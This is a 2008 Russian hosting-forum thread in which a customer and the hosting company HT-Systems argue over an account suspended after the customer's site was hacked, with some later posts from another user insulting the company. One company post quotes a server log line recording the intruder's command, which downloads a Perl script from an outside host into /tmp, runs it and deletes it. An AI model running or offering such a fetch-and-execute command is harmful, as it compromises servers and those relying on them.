Выбираю хостинг - majordomo, ht-systems?

basterr
На сайте с 24.11.2005
Offline
719
#41
HT-Systems.ru:
Вы уж определитесь рекомендовать или не рекомендовать С чего уж так вдруг? Что значит не поможет техподдержка?

о, отличненько, вы тут появились. я уже определился. почитайте тему /ru/forum/250748 я думаю поймете почему я больше вас не рекомендую. я конечно понимаю, что оказание такой помощи может не входить в ваши услуги, но мне это не нравится, поэтому и говорю - будут серьезные проблемы - техподдержка вам не поможет, ни за бесплатно, ни за деньги. даже толком не объяснит что делать.

з.ы. от вас я уже съехал, такое отношение к клиенту мне не нравится.

з.ы.ы. да вопросик еще - я могу забрать деньги, что заплатил за 3 месяца?

HT-Systems.ru
На сайте с 30.01.2008
Offline
102
#42

Здравствуйте!

Ознакомился, спасибо!

Теперь хочу, что бы Вы выслушали позицию компании. Пусть даже вслед Вашему уходу.

Есть условия договора, на которые Вы соглашаетесь при заказе услуг. В них четко сказано, за что приостанавливается предоставление Услуг Абоненту:

(б) действий, направленных на ограничение или препятствование в доступе других пользователей к Услугам, а также осуществления попыток противоправного доступа к ресурсам ИСПОЛНИТЕЛЯ и/или к другим ресурсам, доступным через сеть Интернет;

Сотрудник компании заметив, что с Вашего аккаунта шел запуск вредоносных скриптов, и кроме это загружал ресурсы сервера, поступил правильно. Заметьте, даже проанализировал лог и подсказал Вам ( Jul 20 23:38:16 www : TTY=unknown ; PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd /tmp;wget http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt) где возможно, повторюсь возможно, а не только там и все, есть проблема. Вы отреагировали ночью, проблему вроде бы закрыли, доступ открыли.

Далее снова проблема. Jul 23 16:10:09 www : TTY=unknown ; WD=/storage/home/srv8005/htdocs/potup ; USER=srv8005 ; COMMAND=/bin/sh -c host -W 1 '77.121.222.62' И снова мы проанализировали лог и подсказали где возможно проблема.

На лицо два грубых нарушения условий договора. За что уже следует заблокировать аккаунт и прекратить навсегда предоставление услуг. Потому что мы не уверены, Вы ли с серверов запускает ДДос, или не Вы.

Вас попросили самостоятельно разобраться, выявить проблемы, устранить и продолжить дальше пользоваться услугами. На что Вы обвинили нас в странности работы службы технической поддержки, в отсутствии услуги администрирования сайтов клиента. Извините, но это нам решать какую услугу вводить, а какую не вводить.

Крайне неприятно то, что Вы попытались сложить Ваши проблемы на нас. Мы лишь четко следовали условиям договора, но все же подсказывая Вам, где замечена проблема.

Поэтому и я заявляю, что если и будет серьезная проблема у клиента из за его умения/неумения администрировать свои ресурсы, а не из за наших проблем, то сотрудник постарается ему помочь безвозмездно, в свободное от работы время. Как уже было не раз.

Извините, что мы своим бездействием причинили Вам массу неудобств.

Вопрос возврата неиспользованных денежных средств, рассматривается не здесь. Обратитесь в компанию.

Покупая 1С-Битрикс или CMS.UMI в подарок Безлимитный Хостинг на 2,5 года и Домен - бесплатно! (http://www.hts.ru/ru/service/software/bitrix/) Тема на Searchengines: отзывы, советы, комментарии. ()
basterr
На сайте с 24.11.2005
Offline
719
#43
HT-Systems.ru:
Извините, но это нам решать какую услугу вводить, а какую не вводить.

вам конечно. поэтому и ушел. подсказали тоже мне. очень хорошая подсказка - анализируйте логи. мне вот это не понравилось. ну, собсно, говорить тут не очем. вы не обязаны ковыряться в логах, мне не нравится, что служба поддержки мне вообще не помогает в сложной ситуации, мнения расходятся, дальнейшее "сотрудничество" бесполезно.

HT-Systems.ru:
Крайне неприятно то, что Вы попытались сложить Ваши проблемы на нас.

да где же я пытался свалить на вас хоть что-то? я только помощи просил хоть какой-нибудь. мне вас обвинять не в чем, ломанули-то меня и акк поделом закрыли за это ессно.

з.ы. и вот только не нужно меня "обвинять" в том, что я еще специально мог скрипт запускать, не уверены. хех. я на идиота похож чтоли, чтоб с основного акка, которым пользуюсь уже года два, запускать "вредноносные скрипты"?

basterr добавил 24.07.2008 в 20:23

HT-Systems.ru:
На лицо два грубых нарушения условий договора. За что уже следует заблокировать аккаунт и прекратить навсегда предоставление услуг.

кстати, хорошая такая позиция. если сайт клиента ломанут - все, пошел вон с хостинга.

HT-Systems.ru
На сайте с 30.01.2008
Offline
102
#44

кстати, хорошая такая позиция. если сайт клиента ломанут - все, пошел вон с хостинга.

Уважаемый клиент!

Совсем не обязательно повторять путь недовольных клиентов, и пытаться исказить смысл сказанного мной.

Позиция компания в этом вопросе следующая: если клиент не исправит проблемную ситуацию мы не откроем аккаунт, что бы не создавать проблем другим клиентам и угрозы сети Интернет. А уж Ваших рук это дело, или других рук - нам это неизвестно, клиенту верим. Но когда ситуация повторяется.

И потом. Мы не выгоняем клиента, мы приостанавливаем предоставление услуг. До исправления ситуации.

В любом случае считаю, что Ваш двухлетний опыт сотрудничества с нами больше оставил положительного, чем отрицательного.

Удачи Вам на новом месте. А вернутся всегда можно☝

Хазарин
На сайте с 05.02.2008
Offline
130
#45

ЭХ! Была когда-то хорошая компания, называлась НеваХост, но была куплена вот этими вот б....и, которые называются ht-systems...:)

Все клиенты НеваХост ушли на другие хостинги, а они дошли до того, что новых вищут на форумах тут...гыыы :) Не позорились бы хоть

ЧН
На сайте с 19.03.2008
Offline
43
#46

А у вас какие-то проблемы с этим?

Я лично люблю быть в курсе дела. Это единственная причина.

Хазарин
На сайте с 05.02.2008
Offline
130
#47
Черняев Николай:
А у вас какие-то проблемы с этим?
Я лично люблю быть в курсе дела. Это единственная причина.

Лучше бы с клиентами так работал, чем на форумах сидеть...😡

basterr
На сайте с 24.11.2005
Offline
719
#48
HT-Systems.ru:
Совсем не обязательно повторять путь недовольных клиентов, и пытаться исказить смысл сказанного мной.

да я и не искажал. вас же и процитировал. еще раз могу:

HT-Systems.ru:
На лицо два грубых нарушения условий договора. За что уже следует заблокировать аккаунт и прекратить навсегда предоставление услуг.

ну да ладно. тут спорить не о чем.

з.ы. или выражайтесь тогда сразу четче. а то из вашей цитаты смысл выходит только один, что я и написал выше.

ЧН
На сайте с 19.03.2008
Offline
43
#49

По поводу четкости позиции вы правы...

Хазарин:
Лучше бы с клиентами так работал, чем на форумах сидеть...😡

Господин, успокойтесь... Зачем так нервничать? 🚬

P.S. Где мне сидеть - другие разберутся...

Хазарин
На сайте с 05.02.2008
Offline
130
#50
Черняев Николай:
По поводу четкости позиции вы правы...



Господин, успокойтесь... Зачем так нервничать? 🚬

P.S. Где мне сидеть - другие разберутся...

Я с вами б...ми перенервничал еще три года назад, когда вы назывались 310, просто неприятно видеть вашу зловонную контору из Валуйхоста на этом уважаемом форуме. 😡

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий